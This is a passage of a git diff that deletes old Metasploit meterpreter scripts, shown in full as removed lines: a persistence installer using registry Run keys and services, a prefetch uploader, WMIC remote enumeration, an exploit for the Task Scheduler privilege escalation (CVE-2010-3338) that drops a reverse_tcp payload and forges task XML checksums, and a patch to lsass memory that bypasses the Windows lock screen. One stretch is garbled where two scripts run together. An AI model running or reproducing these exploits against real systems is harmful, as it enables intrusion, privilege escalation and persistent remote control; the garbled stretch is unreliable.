- key_path = "#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
- print_status("Installing into autorun as #{key_path}\\#{nam}")
- if key
- registry_setvaldata("#{key_path}", nam, script_on_target, "REG_SZ")
- print_good("Installed into autorun as #{key_path}\\#{nam}")
- file_local_write(@clean_up_rc, "reg deleteval -k '#{key_path}' -v #{nam}\n")
- else
- print_error("Error: failed to open the registry key for writing")
- end
-end
-
-# Function to install payload as a service
-#-------------------------------------------------------------------------------
-def install_as_service(script_on_target)
- if not is_uac_enabled? or is_admin?
- print_status("Installing as service..")
- nam = Rex::Text.rand_text_alpha(rand(8)+8)
- print_status("Creating service #{nam}")
- service_create(nam, nam, "cscript \"#{script_on_target}\"")
- file_local_write(@clean_up_rc, "execute -H -f sc -a \"delete #{nam}\"\n")
- else
- print_error("Insufficient privileges to create service")
- end
-end
-
-
-################## Main ##################
-@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-h"
- usage
- when "-r"
- rhost = val
- when "-p"
- rport = val.to_i
- when "-i"
- delay = val.to_i
- when "-X"
- install = true
- key = "HKLM"
- when "-S"
- serv = true
- when "-U"
- install = true
- key = "HKCU"
- when "-A"
- autoconn = true
- when "-L"
- target_dir = val
- when "-T"
- altexe = val
- when "-P"
- payload_type = val
- end
-}
-
-# Check for Version of Meterpreter
-unless client.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(client.arch)
- wrong_meter_version(client.session_type)
-end
-
-print_status("Running Persistence Script")
-# Create undo script
-@clean_up_rc = log_file()
-print_status("Resource file for cleanup created at #{@clean_up_rc}")
-# Create and Upload Payload
-raw = create_payload(payload_type, rhost, rport)
-script = create_script(delay, altexe, raw, payload_type.include?('/x64/'))
-script_on_target = write_script_to_target(target_dir, script)
-
-# Start exploit/multi/handler
-if autoconn
- set_handler(payload_type, rhost, rport)
-end
-
-# Execute on target host
-targets_exec(script_on_target)
-
-# Install in registry
-if install
- write_to_reg(key,script_on_target)
-end
-
-# Install as a service
-if serv
- install_as_service(script_on_target)
-end
-
diff --git a/scripts/meterpreter/prefetchtool.rb b/scripts/meterpreter/prefetchtool.rb
deleted file mode 100644
index 97e346b5ff..0000000000
--- a/scripts/meterpreter/prefetchtool.rb
+++ /dev/null
@@ -1,195 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
-#Meterpreter script for extracting information from windows prefetch folder
-#Provided by Milo at keith.lee2012[at]gmail.com
-#Verion: 0.1.0
-
-require 'fileutils'
-require 'net/http'
-require 'digest/sha1'
-
-@session = client
-@host,@port = @session.session_host, session.session_port
-
-# Script Options
-@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu."],
- "-p" => [ false, "List Installed Programs"],
- "-c" => [ false, "Disable SHA1/MD5 checksum"],
- "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"],
- "-i" => [ false, "Perform lookup for software name"],
- "-l" => [ false, "Download Prefetch Folder Analysis Log"]
-)
-
-@tempdir = @session.sys.config.getenv('TEMP')
-
-#---------------------------------------------------------------------------------------------------------
-def read_program_list
- key = @session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', KEY_READ)
- sfmsvals = key.enum_key
- sfmsvals.each do |test1|
- begin
- key2 = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"+test1
- root_key2, base_key2 = @session.sys.registry.splitkey(key2)
- value1 = "DisplayName"
- value2 = "DisplayVersion"
- open_key = @session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
- v1 = open_key.query_value(value1)
- v2 = open_key.query_value(value2)
- print_status("#{v1.data}\t(Version: #{v2.data})")
- rescue
- end
- end
-end
-
-def prefetch_dump(options, logging=false)
-
- lexe = File.join(Msf::Config.data_directory, "prefetch.exe")
- rexe = sprintf("%.5d",rand(100000)) + ".exe"
- rlog = sprintf("%.5d",rand(100000)) + ".txt"
-
- print_status("Uploading Prefetch-tool for analyzing Prefetch folder...")
- begin
- @session.fs.file.upload_file("#{@tempdir}\\#{rexe}", lexe)
- print_status("Prefetch-tool uploaded as #{@tempdir}\\#{rexe}")
- rescue ::Interrupt; raise $!
- rescue ::Exception => e
- print_status("The following error was encountered: #{e.class} #{e}")
- return
- end
-
- begin
-
- if(logging)
- options += " --txt=#{@tempdir}\\#{rlog}"
- end
-
- r = @session.sys.process.execute("cmd.exe /c #{@tempdir}\\#{rexe} #{options} #{rlog}", nil, {'Hidden' => 'true','Channelized' => true})
- while(d = r.channel.read)
- d.split("\n").each do |out|
- print_status("OUT> #{out.strip}")
- end
- end
-
- found = true
- while (not found)
- found = false
- @session.sys.process.get_processes().each do |x|
- found = false
- if (x['name'].downcase == rexe)
- found = true
- end
- end
- sleep(0.5) if found
- end
-
- r.channel.close
- r.close
-
- print_status("Deleting #{rexe} from target...")
- @session.sys.process.execute("cmd.exe /c del #{@tempdir}\\#{rexe}", nil, {'Hidden' => 'true'})
-
- print_status("Clearing prefetch-tool prefetch entry ...")
- @session.sys.process.execute("cmd.exe /c del %windir%\\prefetch\\#{rexe.gsub('.exe','')}*.pf", nil, {'Hidden' => 'true'})
-
- if(logging)
- logfile = ::File.join(Msf::Config.config_directory, 'logs', 'prefetch', @host + "-" + ::Time.now.strftime("%Y%m%d.%M%S") + ".log")
- print_status("[*] Saving prefetch logs to #{logfile}...")
- @session.fs.file.download_file(logfile, "#{@tempdir}\\#{rlog}")
- print_status("[*] Deleting log file from target...")
- @session.sys.process.execute("cmd.exe /c del #{@tempdir}\\#{rlog}", nil, {'Hidden' => 'true'})
- end
-
- rescue ::Interrupt; raise $!
- rescue ::Exception => e
- print_status("The following error was encountered: #{e.class} #{e}")
- return
- end
-end
-
-
-#check for proper Meterpreter Platform
-def unsupported
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-
-
-
-################## MAIN ##################
-
-options = ""
-logging = false
-view_list = false
-check_update = false
-
-@@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-x"
- options += " --x=" + val
- when "-c"
- options += " --disable-md5 --disable-sha1"
- when "-p"
- view_list = true
- when "-i"
- options += " --inet-lookup"
- when "-l"
- logging = true
- when "-h"
- print_status( "Prefetch-tool Meterpreter Script")
- print_line(@@exec_opts.usage)
- raise Rex::Script::Completed
- end
-}
-unsupported if client.platform !~ /win32|win64/i
-prefetch_local = ::File.join(Msf::Config.data_directory, "prefetch.exe")
-
-if !(::File.exist?(prefetch_local))
- print_status("No local copy of prefetch.exe, downloading from the internet...")
- Net::HTTP.start("prefetch-tool.googlecode.com") do |http|
- req = Net::HTTP::Get.new("/files/prefetch.exe")
- resp = http.request(req)
- ::File.open(::File.join(Msf::Config.data_directory, "prefetch.exe"), "wb") do |fd|
- fd.write(resp.body)
- end
- end
- print_status("Downloaded prefetch.exe to #{prefetch_local}")
-else
- print_status("Checking for an updated copy of prefetch.exe..")
- digest = Digest::SHA1.hexdigest(::File.read(prefetch_local, ::File.size(prefetch_local)))
-
- Net::HTTP.start("code.google.com") do |http|
- req = Net::HTTP::Get.new("/p/prefetch-tool/downloads/detail?name=prefetch.exe&can=2&q=")
- resp = http.request(req)
- body = resp.body
- chksum = body.scan(/SHA1 Checksum: <\/th>.* | /,'')
- chksum.sub!(/ [ false, "Help menu."],
- "-t" => [ true, "The target address"],
- "-u" => [ true, "User on the target system (If not provided it will use credential of process)"],
- "-p" => [ true, "Password of user on target system"]
-)
-
-# Create Filename info to be appended to downloaded files
-filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
-
-# Create a directory for the logs
-logs = ::File.join(Msf::Config.log_directory, 'scripts', 'remotewinenum')
-
-# Create the log directory
-::FileUtils.mkdir_p(logs)
-
-# WMIC Commands that will be executed on the Target
-wmic = [
- 'environment list',
- 'share list',
- 'nicconfig list',
- 'computersystem list',
- 'useraccount list',
- 'group list',
- 'sysaccount list',
- 'volume list brief',
- 'logicaldisk get description,filesystem,name,size',
- 'netlogin get name,lastlogon,badpasswordcount',
- 'netclient list brief',
- 'netuse get name,username,connectiontype,localname',
- 'share get name,path',
- 'nteventlog get path,filename,writeable',
- 'service list brief',
- 'process list brief',
- 'startup list full',
- 'rdtoggle list',
- 'product get name,version',
- 'qfe list'
-]
-################## Function Declarations ##################
-
-# Function for running a list of WMIC commands stored in a array, returs string
-def wmicexec(session,wmic,user,pass,trgt)
- print_status("Running WMIC Commands ....")
- tmpout = ''
- command = nil
- runfail = 0
- runningas = session.sys.config.getuid
- begin
- tmp = session.sys.config.getenv('TEMP')
- # Temporary file on windows host to store results
- wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
-
- wmic.each do |wmi|
- if user == nil
- print_status("The commands will be ran under the credentials of #{runningas}")
- command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
- else
- command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
- end
- print_status "\trunning command wimic #{wmi}"
- r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
- sleep(1)
- r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
- sleep(1)
- r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
- sleep(1)
- #print_status "\twmic #{command}"
- r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
- #Making sure that wmic finishes before executing next wmic command
- prog2check = "wmic.exe"
- found = 0
- sleep(2)
- while found == 0
- session.sys.process.get_processes().each do |x|
- found =1
- if prog2check == (x['name'].downcase)
- sleep(0.5)
- found = 0
- end
- end
- end
- r.close
- end
- # Read the output file of the wmic commands
- wmioutfile = session.fs.file.new(wmicfl, "rb")
- until wmioutfile.eof?
- tmpout << wmioutfile.read
- end
- # Close output file in host
- wmioutfile.close
- rescue ::Exception => e
- print_status("Error running WMIC commands: #{e.class} #{e}")
- end
- # We delete the file with the wmic command output.
- c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
- c.close
- tmpout
-end
-
-#------------------------------------------------------------------------------
-# Function to generate report header
-def headerbuid(session,target,dest)
- # Header for File that will hold all the output of the commands
- info = session.sys.config.sysinfo
- header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
- header << "Running as: #{client.sys.config.getuid}\n"
- header << "From: #{info['Computer']}\n"
- header << "OS: #{info['OS']}\n"
- header << "Target: #{target}\n"
- header << "\n\n\n"
-
- print_status("Saving report to #{dest}")
- header
-
-end
-
-#------------------------------------------------------------------------------
-# Function Help Message
-def helpmsg
- print("Remote Windows Enumeration Meterpreter Script\n" +
- "This script will enumerate windows hosts in the target enviroment\n" +
- "given a username and password or using the credential under witch\n" +
- "Meterpeter is running using WMI wmic windows native tool.\n" +
- "Usage:\n" +
- @@exec_opts.usage)
-end
-################## MAIN ##################
-if client.platform =~ /win32|win64/
- localos = session.sys.config.sysinfo
-
- # Check that the command is not being ran on a Win2k host
- # since wmic is not present in Windows 2000
- if localos =~ /(Windows 2000)/
- print_status("This script is not supported to be ran from Windows 2000 servers!!!")
- else
- # Parsing of Options
- @@exec_opts.parse(args) { |opt, idx, val|
- case opt
-
- when "-t"
- trg = val
- when "-u"
- rusr = val
- when "-p"
- rpass = val
- when "-h"
- helpmsg
- helpcall = 1
- end
-
- }
- #logfile name
- dest = logs + "/" + trg + filenameinfo
- # Executing main logic of the script
- if helpcall == 0 and trg != ""
-
- # Making sure that is running as System a Username and Password for target machine must be provided
-
- if is_system? && rusr == nil && rpass == nil
-
- print_status("Stopped: Running as System and no user provided for connecting to target!!")
-
- else trg != nil && helpcall != 1
-
- file_local_write(dest,headerbuid(session,trg,dest))
- file_local_write(dest,wmicexec(session,wmic,rusr,rpass,trg))
-
- end
- elsif helpcall == 0 and trg == ""
-
- helpmsg
- end
- end
-else
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
diff --git a/scripts/meterpreter/schelevator.rb b/scripts/meterpreter/schelevator.rb
deleted file mode 100644
index 1f1f9627b0..0000000000
--- a/scripts/meterpreter/schelevator.rb
+++ /dev/null
@@ -1,394 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
-##
-#
-# This script exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet
-#
-# Disclosed around Oct 22, 2010
-#
-# written by jduck
-#
-# NOTE: Thanks to webDEViL for the information about disable/enable.
-# http://www.exploit-db.com/exploits/15589/
-#
-# CVE 2010-3338
-# MSB MS10-092
-#
-##
-
-require 'zlib'
-
-#
-# Filter out sessions that this definitely won't work on.
-#
-unless [ARCH_X64, ARCH_X86, ARCH_JAVA].include(session.arch)
- print_error("#{session.arch} is not supported.")
- raise Rex::Script::Completed
-end
-
-unless session.platform == 'windows'
- print_error("#{session.platform} is not supported.")
- raise Rex::Script::Completed
-end
-
-if session.sys.config.sysinfo["Architecture"] == ARCH_X64 && session.arch == ARCH_X86
- #
- # WOW64 Filesystem Redirection prevents us opening the file directly. To make matters
- # worse, meterpreter/railgun creates things in a new thread, making it much more
- # difficult to disable via Wow64EnableWow64FsRedirection. Until we can get around this,
- # offer a workaround and error out.
- #
- print_error("Running against via WOW64 is not supported, try using an x64 meterpreter...")
- raise Rex::Script::Completed
-end
-
-vuln = false
-winver = session.sys.config.sysinfo["OS"]
-affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ]
-affected.each { |v|
- if winver.include? v
- vuln = true
- break
- end
-}
-if not vuln
- print_error("#{winver} is not vulnerable.")
- raise Rex::Script::Completed
-end
-
-
-#
-# We have a chance to succeed, check params
-#
-@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu." ],
- "-c" => [ true, "Execute the specified command" ],
- "-u" => [ true, "Upload and execute the specified file" ],
- "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
- "-p" => [ true, "The port on the remote host where Metasploit is listening"],
- "-t" => [ true, "Use the specified task name" ]
-)
-
-def usage
- print_line("Schelevator -- Exploit for Windows Vista/7/2008 Task Scheduler 2.0 Privilege Escalation")
- print(@@exec_opts.usage)
- raise Rex::Script::Completed
-end
-
-rhost = Rex::Socket.source_address
-rport = 4444
-taskname = nil
-cmd = nil
-upload_fn = nil
-@@exec_opts.parse(args) { |opt, idx, val|
- case opt
-
- when "-c"
- cmd = val
-
- when "-u"
- upload_fn = val
- if not ::File.exist?(upload_fn)
- raise "Specified file to upload does not exist!"
- end
-
- when "-t"
- taskname = val
-
- when "-h"
- usage
-
- when "-r"
- rhost = val
-
- when "-p"
- rport = val.to_i
- end
-}
-
-envs = session.sys.config.getenvs('SystemRoot', 'TEMP')
-sysdir = envs['SystemRoot']
-tmpdir = envs['TEMP']
-
-# Must have at least one of -c or -u
-if not cmd and not upload_fn
- print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
-
- # Get the exe payload.
- pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
- pay.datastore['LHOST'] = rhost
- pay.datastore['LPORT'] = rport
- raw = pay.generate
- exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
- #and placing it on the target in %TEMP%
- tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
- cmd = tmpdir + "\\" + tempexename + ".exe"
- print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
- fd = client.fs.file.new(cmd, "wb")
- fd.write(exe)
- fd.close
-
- #get handler to be ready
- handler = client.framework.exploits.create("multi/handler")
- handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
- handler.datastore['LHOST'] = rhost
- handler.datastore['LPORT'] = rport
- handler.datastore['InitialAutoRunScript'] = "migrate -f"
- handler.datastore['ExitOnSession'] = false
- #start a handler to be ready
- handler.exploit_simple(
- 'Payload' => handler.datastore['PAYLOAD'],
- 'RunAsJob' => true
- )
-end
-
-if cmd
- print_status("Using command: #{cmd}")
-end
-
-#
-# Upload the payload command if needed
-#
-if upload_fn
- begin
- location = tmpdir.dup
- ext = upload_fn.split('.')
- if ext
- ext = ext.last.downcase
- if ext == "exe"
- location << "\\svhost#{rand(100)}.exe"
- else
- location << "\\TMP#{rand(100)}.#{ext}"
- end
- else
- location << "\\TMP#{rand(100)}"
- end
-
- print_status("Uploading #{upload_fn} to #{location}....")
- session.fs.file.upload_file(location, upload_fn)
- print_status("Upload complete.")
- rescue ::Exception => e
- print_error("Error uploading file #{upload_fn}: #{e.class} #{e}")
- raise e
- end
-
- cmd ||= location
-end
-
-def crc32(data)
- table = Zlib.crc_table
- crc = 0xffffffff
- data.unpack('C*').each { |b|
- crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
- }
- crc
-end
-
-def fix_crc32(data, old_crc)
- #
- # CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably
- # reversed from Microsoft's code)
- #
- bwd_table = [
- 0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
- 0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
- 0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
- 0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
- 0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
- 0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
- 0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
- 0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
- 0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
- 0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
- 0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
- 0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
- 0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
- 0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
- 0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
- 0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
- 0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
- 0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
- 0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
- 0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
- 0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
- 0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
- 0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
- 0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
- 0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
- 0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
- 0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
- 0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
- 0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
- 0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
- 0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
- 0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
- 0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
- 0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
- 0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
- 0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
- 0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
- 0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
- 0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
- 0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
- 0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
- 0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
- 0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
- 0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
- 0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
- 0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
- 0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
- 0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
- 0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
- 0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
- 0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
- 0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
- 0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
- 0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
- 0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
- 0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
- 0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
- 0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
- 0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
- 0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
- 0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
- 0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
- 0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
- 0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
- ]
-
- crc = crc32(data[0, data.length - 12])
- data[-12, 4] = [crc].pack('V')
-
- data[-12, 12].unpack('C*').reverse.each { |b|
- old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
- }
- data[-12, 4] = [old_crc].pack('V')
-end
-
-def exec_schtasks(cmdline, purpose)
- lns = cmd_exec("cmd.exe /c " + cmdline + " && echo SCHELEVATOR")
- success = false
- lns.each_line { |ln|
- ln.chomp!
- if ln =~ /^SCHELEVATOR$/
- success = true
- else
- print_status(ln)
- end
- }
- raise "Unable to #{purpose}!" if not success
-end
-
-
-def read_task_file(taskname, taskfile)
- print_status("Reading the task file contents from #{taskfile}...")
-
- # Can't read the file directly on 2008?
- content = ''
- fd = client.fs.file.new(taskfile, "rb")
- until fd.eof?
- content << fd.read
- end
- fd.close
-
- content
-end
-
-
-#
-# Create a new task to do our bidding, but make sure it doesn't run.
-#
-taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
-taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
-
-print_status("Creating task: #{taskname}")
-cmdline = "schtasks.exe /create /tn #{taskname} /tr \"#{cmd}\" /sc monthly /f"
-exec_schtasks(cmdline, "create the task")
-
-#
-# Read the contents of the newly creates task file
-#
-content = read_task_file(taskname, taskfile)
-
-#
-# Double-check that we got what we expect.
-#
-if content[0,2] != "\xff\xfe"
- #
- # Convert to unicode, since it isn't already
- #
- content = content.unpack('C*').pack('v*')
-else
- #
- # NOTE: we strip the BOM here to exclude it from the crc32 calculation
- #
- content = content[2,content.length]
-end
-
-
-#
-# Record the crc32 for later calculations
-#
-old_crc32 = crc32(content)
-print_status("Original CRC32: 0x%x" % old_crc32)
-
-#
-# Convert the file contents from unicode
-#
-content = content.unpack('v*').pack('C*')
-
-#
-# Mangle the contents to now run with SYSTEM privileges
-#
-content.gsub!('LeastPrivilege', 'HighestAvailable')
-content.gsub!(/.*<\/UserId>/, 'S-1-5-18')
-content.gsub!(/.*<\/Author>/, 'S-1-5-18')
-#content.gsub!('InteractiveToken', 'Password')
-content.gsub!('Principal id="Author"', 'Principal id="LocalSystem"')
-content.gsub!('Actions Context="Author"', 'Actions Context="LocalSystem"')
-content << ""
-
-#
-# Convert it back to unicode
-#
-content = Rex::Text.to_unicode(content)
-
-#
-# Fix it so the CRC matches again
-#
-fix_crc32(content, old_crc32)
-new_crc32 = crc32(content)
-print_status("Final CRC32: 0x%x" % new_crc32)
-
-#
-# Write the new content back
-#
-print_status("Writing our modified content back...")
-fd = client.fs.file.new(taskfile, "wb")
-fd.write "\xff\xfe" + content
-fd.close
-
-#
-# Run the task :-)
-#
-print_status("Disabling the task...")
-exec_schtasks("schtasks.exe /change /tn #{taskname} /disable", "disable the task")
-
-print_status("Enabling the task...")
-exec_schtasks("schtasks.exe /change /tn #{taskname} /enable", "enable the task")
-
-print_status("Executing the task...")
-exec_schtasks("schtasks.exe /run /tn #{taskname}", "run the task")
-
-
-#
-# And delete it.
-#
-print_status("Deleting the task...")
-exec_schtasks("schtasks.exe /delete /f /tn #{taskname}", "delete the task")
diff --git a/scripts/meterpreter/screen_unlock.rb b/scripts/meterpreter/screen_unlock.rb
deleted file mode 100644
index 14dd1036e3..0000000000
--- a/scripts/meterpreter/screen_unlock.rb
+++ /dev/null
@@ -1,84 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
-#
-# Script to unlock a windows screen by L4teral
-# Needs system prvileges to run and known signatures for the target system.
-# This script patches msv1_0.dll loaded by lsass.exe
-#
-# Based on the winlockpwn tool released by Metlstorm: http://www.storm.net.nz/projects/16
-#
-
-revert = false
-targets = [
- { :sig => "8bff558bec83ec50a1", :sigoffset => 0x9927, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x99cc, :os => /Windows XP.*Service Pack 2/ },
- { :sig => "8bff558bec83ec50a1", :sigoffset => 0x981b, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x98c0, :os => /Windows XP.*Service Pack 3/ },
- { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ },
- { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ },
- { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ },
- { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ }
-]
-
-opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ],
- "-r" => [ false, "revert the patch (enable screen locking again)"]
-)
-opts.parse(args) { |opt, idx, val|
- case opt
- when "-r"
- revert = true
- when "-h"
- print_line("")
- print_line("USAGE: run screen_unlock [-r]")
- print_line(opts.usage)
- raise Rex::Script::Completed
- end
-}
-def unsupported
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-unsupported if client.platform !~ /win32|win64/i
-os = client.sys.config.sysinfo['OS']
-
-targets.each do |t|
- if os =~ t[:os]
- target = t
- print_status("OS '#{os}' found in known targets")
- pid = client.sys.process["lsass.exe"]
- p = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
- dllbase = p.image["msv1_0.dll"]
-
- sig = p.memory.read(dllbase + target[:sigoffset], target[:sig].length / 2).unpack("H*")[0]
- if sig != target[:sig]
- print_error("found signature does not match")
- next
- end
- old_code = p.memory.read(dllbase + target[:patchoffset], target[:orig_code].length / 2).unpack("H*")[0]
- if !((old_code == target[:orig_code] && !revert) || (old_code == target[:patch] && revert))
- print_error("found code does not match")
- next
- end
-
- print_status("patching...")
- new_code = revert ? target[:orig_code] : target[:patch]
- p.memory.write(dllbase + target[:patchoffset], [new_code].pack("H*"))
-
- written_code = p.memory.read(dllbase + target[:patchoffset], target[:patch].length / 2).unpack("H*")[0]
- if ((written_code == target[:patch] && !revert) || (written_code == target[:orig_code] && revert))
- print_status("done!")
- raise Rex::Script::Completed
- else
- print_error("failed!")
- next
- end
- end
-end
-
-print_status("no working target found")
-
diff --git a/scripts/meterpreter/screenspy.rb b/scripts/meterpreter/screenspy.rb
deleted file mode 100644
index 77c1f86b84..0000000000
--- a/scripts/meterpreter/screenspy.rb
+++ /dev/null
@@ -1,158 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
-# Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com
-#
-# Thie script will open an interactive view of remote hosts
-# You will need firefox installed on your machine
-
-
-require 'fileutils'
-
-opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu." ],
- "-d" => [ true, "The Delay in seconds between each screenshot." ],
- "-t" => [ true, "The time to run in sec." ],
- "-s" => [ true, "The local system linux/windows" ]
-)
-
-freq = 3
-count = 10
-file = "screenshot.jpeg"
-meter_type = client.platform
-localsys = "linux"
-
-opts.parse(args) { |opt, idx, val|
- case opt
- when '-d'
- freq = val.to_i
